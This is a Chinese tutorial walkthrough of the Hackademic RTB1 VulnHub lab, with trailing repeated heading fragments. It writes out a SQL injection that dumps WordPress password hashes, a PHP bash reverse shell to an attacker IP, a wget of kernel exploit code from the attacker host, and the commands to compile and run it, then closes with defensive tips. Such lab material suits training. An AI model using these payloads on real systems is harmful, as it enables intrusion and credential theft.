Linux渗透实战：Hackademic RTB1靶场提权教学文档<\/h1>

0x1 靶场概述<\/h2>

靶机简介<\/h3>

Hackademic: RTB1是vulnhub上的一个渗透测试靶机，主要考察以下技能：<\/p>

信息收集与端口扫描<\/li>
WordPress漏洞利用<\/li>
SQL注入（手工与sqlmap）<\/li>
后台密码爆破与登录<\/li>
文件上传与反弹shell<\/li>

内核提权技术<\/li> <\/ul>

靶机下载<\/h3>
下载地址：https:\/\/www.vulnhub.com\/entry\/hackademic-rtb1,17\/<\/p>

0x2 信息收集阶段<\/h2>

1. 主机探测<\/h3>

使用arp-scan探测局域网内主机：<\/p>

arp-scan -l
<\/span><\/span><\/code><\/pre>发现靶机IP为10.10.10.134<\/p>
2. 端口扫描<\/h3>
使用nmap进行TCP端口扫描：<\/p>
nmap -sS -A -p- 10.10.10.134
<\/span><\/span><\/code><\/pre>发现仅开放80端口，22端口SSH服务关闭<\/p>
UDP端口扫描（可选）：<\/p>
nmap -sU --top-ports 20<\/span> 10.10.10.134
<\/span><\/span><\/code><\/pre>3. 漏洞扫描<\/h3>
使用nmap脚本扫描漏洞：<\/p>
nmap --script=<\/span>vuln -p80 10.10.10.134
<\/span><\/span><\/code><\/pre>发现几个老版本漏洞（如CVE-2007-6750、CVE-2011-3192），但实际利用价值不大<\/p>
0x3 Web渗透阶段<\/h2>
1. Web服务信息收集<\/h3>
访问http:\/\/10.10.10.134，发现静态HTML页面，提示获取root权限并读取\/root\/key.txt<\/p>
查看页面源代码，发现WordPress CMS框架信息：<\/p>

版本：1.5.1.1（较旧版本，可能存在漏洞）<\/li>
<\/ul>
2. SQL注入漏洞利用<\/h3>
手工联合注入步骤：<\/h4>


测试注入点：<\/p>

访问带参数的URL，如?cat=1'<\/code>，发现报错信息：
SELECT * FROM wp_categories WHERE cat_ID = 1\' LIMIT 1
<\/code><\/pre>
<\/li>
<\/ul>
<\/li>

确定列数：<\/p>
1<\/span> order<\/span> by<\/span> 1<\/span>,2<\/span>,3<\/span>,4<\/span>,5<\/span>   #<\/span> 正常<\/span>
<\/span><\/span>1<\/span> order<\/span> by<\/span> 1<\/span>,2<\/span>,3<\/span>,4<\/span>,5<\/span>,6<\/span> #<\/span> 报错<\/span>
<\/span><\/span><\/code><\/pre>确定有5列<\/p>
<\/li>

联合查询测试：<\/p>
0<\/span> union<\/span> select<\/span> 1<\/span>,2<\/span>,3<\/span>,4<\/span>,5<\/span>
<\/span><\/span><\/code><\/pre>发现第2列有回显<\/p>
<\/li>

获取数据库信息：<\/p>
0<\/span> union<\/span> select<\/span> 1<\/span>,version<\/span>(),3<\/span>,4<\/span>,5<\/span>
<\/span><\/span>0<\/span> union<\/span> select<\/span> 1<\/span>,database<\/span>(),3<\/span>,4<\/span>,5<\/span>
<\/span><\/span><\/code><\/pre>确认数据库名为"wordpress"<\/p>
<\/li>

获取用户表数据：<\/p>
0<\/span> union<\/span> select<\/span> 1<\/span>,group_concat(user_login,0<\/span>x2d,user_pass,0<\/span>x2d,user_level),3<\/span>,4<\/span>,5<\/span> from<\/span> wp_users
<\/span><\/span><\/code><\/pre>获取到用户凭证：<\/p>
1-NickJames-21232f297a57a5a743894a0e4a801fc3-1
2-JohnSmith-b986448f0bb9e5e124ca91d3d650f52c-0
3-GeorgeMiller-7cbb3252ba6b7e9c422fac5334d22054-10
4-TonyBlack-a6e514f9486b83cb53d8d932f9a04292-0
5-JasonKonnors-8601f6e1028a8e8a966f6c33fcd9aec4-0
6-MaxBucky-50484c19f1afdaf3841a0d821ed393d2-0
<\/code><\/pre>
<\/li>
<\/ol>
sqlmap自动化注入（可选）：<\/h4>
sqlmap -u "http:\/\/10.10.10.134\/Hackademic_RTB1\/?cat=0"<\/span> --dbs --batch
<\/span><\/span><\/code><\/pre>3. 密码破解与后台登录<\/h3>


识别密码哈希：<\/p>
hash-identifier "7cbb3252ba6b7e9c422fac5334d22054"<\/span>
<\/span><\/span><\/code><\/pre>确认是MD5加密<\/p>
<\/li>

使用cmd5.org解密：<\/p>

GeorgeMiller的密码7cbb3252ba6b7e9c422fac5334d22054<\/code>解密为q1w2e3<\/code><\/li>
<\/ul>
<\/li>

登录WordPress后台：<\/p>

访问http:\/\/10.10.10.134\/wp-login.php<\/code><\/li>
使用凭证：GeorgeMiller \/ q1w2e3<\/li>
<\/ul>
<\/li>
<\/ol>
4. 文件上传与反弹shell<\/h3>


修改WordPress设置允许上传PHP文件：<\/p>

进入"Settings" > "Miscellaneous"<\/li>
启用文件上传并允许PHP文件<\/li>
<\/ul>
<\/li>

准备PHP反弹shell：<\/p>
<?<\/span>php<\/span> exec<\/span>("\/bin\/bash -i >& \/dev\/tcp\/10.10.10.128\/4444 0>&1"<\/span>); ?><\/span>
<\/span><\/span><\/span><\/code><\/pre>或使用revshells.com<\/a>生成<\/p>
<\/li>

上传PHP文件（如bin.php）并访问<\/p>
<\/li>

Kali监听：<\/p>
nc -lvnp 4444<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x4 提权阶段<\/h2>
1. 基本信息收集<\/h3>
在获取的shell中执行：<\/p>
uname -a
<\/span><\/span><\/code><\/pre>输出：<\/p>
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU\/Linux
<\/code><\/pre>
2. 内核提权<\/h3>


搜索相关漏洞：<\/p>
searchsploit linux kernel 2.6.3 | grep -i 'Privilege Escalation'<\/span>
<\/span><\/span><\/code><\/pre><\/li>

筛选合适的漏洞：<\/p>
searchsploit linux kernel 2.6.3 | grep -i 'Privilege Escalation'<\/span> | grep -v 'Ubuntu'<\/span> | grep -v 'CentOS'<\/span> | grep -v 'Debian'<\/span> | grep -v 'RedHat'<\/span>
<\/span><\/span><\/code><\/pre>重点关注：<\/p>

10018.sh<\/li>
15285.c<\/li>
<\/ul>
<\/li>

下载并编译15285.c：<\/p>

本地启动HTTP服务：
python3 -m http.server 80<\/span>
<\/span><\/span><\/code><\/pre><\/li>
靶机下载：
wget http:\/\/10.10.10.128\/15285.c -O \/tmp\/15285.c
<\/span><\/span><\/code><\/pre><\/li>
编译执行：
gcc 15285.c -o 15285<\/span>
<\/span><\/span>chmod -R 777<\/span> 15285<\/span>
<\/span><\/span>.\/15285
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
<\/ol>
3. 获取flag<\/h3>
cat \/root\/key.txt
<\/span><\/span><\/code><\/pre>输出：<\/p>
Yeah!! You must be proud becouse you ve got the password to complete the First Reallistic Hackademic Challenge (Hackademic.RTB1) :)
$ _ d & jgQ >> ak\# b "(Hx" o < la_ %
Regards,
mr. pr0n || p0wnbox.Team || 2011
http:\/\/p0wnbox.com
<\/code><\/pre>
0x5 总结与知识点<\/h2>
关键知识点<\/h3>

信息收集<\/strong>：arp-scan、nmap扫描、目录扫描(dirsearch)<\/li>
SQL注入<\/strong>：手工联合注入、sqlmap使用<\/li>
密码破解<\/strong>：MD5识别与解密<\/li>
WordPress利用<\/strong>：后台登录、文件上传配置<\/li>
反弹shell<\/strong>：PHP exec方法、nc监听<\/li>
内核提权<\/strong>：searchsploit使用、漏洞筛选、编译执行<\/li>
<\/ol>
防御建议<\/h3>

及时更新WordPress版本<\/li>
使用参数化查询防止SQL注入<\/li>
限制文件上传类型<\/li>
定期更新内核补丁<\/li>
使用强密码并定期更换<\/li>
<\/ol>
扩展学习资源<\/h3>

WordPress安全指南<\/a><\/li>
Linux内核漏洞数据库<\/a><\/li>
SQL注入防御<\/a><\/li>
<\/ol>

Linux渗透实战：Hackademic RTB1靶场提权教学文档<\/h1>

0x1 靶场概述<\/h2>

靶机下载<\/h3> 下载地址：https:\/\/www.vulnhub.com\/entry\/hackademic-rtb1,17\/<\/p>

0x2 信息收集阶段<\/h2>

0x3 Web渗透阶段<\/h2>

2. SQL注入漏洞利用<\/h3>

0x4 提权阶段<\/h2>

1. 基本信息收集<\/h3> 在获取的shell中执行：<\/p>

2. 内核提权<\/h3> 搜索相关漏洞：<\/p>

0x5 总结与知识点<\/h2>

扩展学习资源<\/h3> WordPress安全指南<\/a><\/li> Linux内核漏洞数据库<\/a><\/li> SQL注入防御<\/a><\/li> <\/ol>

靶机下载<\/h3>
下载地址：https:\/\/www.vulnhub.com\/entry\/hackademic-rtb1,17\/<\/p>

扩展学习资源<\/h3>

WordPress安全指南<\/a><\/li>
Linux内核漏洞数据库<\/a><\/li>
SQL注入防御<\/a><\/li> <\/ol>